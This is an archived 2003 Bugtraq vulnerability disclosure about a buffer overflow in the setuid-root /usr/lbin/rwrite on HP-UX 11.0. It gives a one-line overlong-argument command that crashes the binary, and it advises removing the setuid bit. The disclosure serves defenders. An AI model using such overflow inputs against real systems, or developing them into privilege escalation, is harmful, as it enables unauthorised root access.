Home page logo

bugtraq logo Bugtraq mailing list archives

HP-UX 11.0 /usr/lbin/rwrite
From: bt () delfi lt
Date: Fri, 2 May 2003 20:16:53 +0300


There is a vulnerability in /usr/lbin/rwrite on HP-UX 11.0 (other versions might be vulnerable too).

/usr/lbin/rwrite is installed setuid to root by default.

$ /usr/lbin/rwrite something `perl -e 'print "A" x 14628'` something
Segmentation fault

Solution : remove setuid bit until patch is available.

Tried to contact security-alert () hp com , got "Client rejected. Access denied".


bt () delfi lt
Meiles zinutes sirdies damai ar riteriui: siusk MEILE numeriu 1325.
Jei siunti draugui, po zodzio MEILE nurodyk jo mob. telefono numeri.
Zinutes kaina 1 Lt.  http://sms.delfi.lt/

  By Date           By Thread  

Current thread:
  • HP-UX 11.0 /usr/lbin/rwrite bt (May 02)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]